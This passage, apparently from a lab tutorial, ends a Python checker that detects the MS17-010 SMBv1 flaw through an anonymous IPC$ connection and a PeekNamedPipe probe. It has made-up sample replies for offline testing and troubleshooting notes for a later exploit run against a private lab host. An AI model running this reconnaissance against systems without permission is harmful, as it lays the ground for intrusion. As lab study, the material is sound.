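        ss = exchange(s, build_session_setup())
        if nt_status(ss) != 0:
            return "anonymous session refused (0x%08X)" % nt_status(ss)
        uid = struct.unpack_from("<H", ss, 28)[0]
        tc = exchange(s, build_tree_connect(host, uid))
        if nt_status(tc) != 0:
            return "IPC$ tree connect refused (0x%08X)" % nt_status(tc)
        tid = struct.unpack_from("<H", tc, 24)[0]
        verdict = classify(nt_status(exchange(s, build_peek_named_pipe(tid, uid))))
        return "%s - %s" % (verdict, native_os(ss))

# Constructed sample replies for offline testing (not captured from a real host)
CONSTRUCTED_UNPATCHED_REPLY = smb_header(SMB_COM_TRANSACTION, status=STATUS_INSUFF_SERVER_RESOURCES)
_NATIVE = b"Windows Server 2008 R2 Datacenter 7600\x00Windows Server 2008 R2 Datacenter 6.1\x00WORKGROUP\x00"
CONSTRUCTED_SESSION_SETUP_REPLY = (smb_header(SMB_COM_SESSION_SETUP_ANDX, uid=2048) + b"\x03"
                                   + struct.pack("<BBHH", 0xFF, 0, 0, 0) + struct.pack("<H", len(_NATIVE)) + _NATIVE)

if __name__ == "__main__": print(check("192.168.31.156"))  # the post's lab target
```

Read the outcome against the troubleshooting list: a ValueError or ConnectionError on the very first exchange means the host never spoke SMBv1 with us (SMBv1 disabled, or 445 filtered by one of the firewalls), which no amount of re-running the exploit will fix; "anonymous session refused" means null sessions are blocked, and both the scanner and the exploit, which authenticate anonymously unless SMBUser/SMBPass are set, will need credentials; "likely patched" means the image already contains the March 2017 fix and a different image is needed; only "likely VULNERABLE" is a case where payload or target tuning is worth the time.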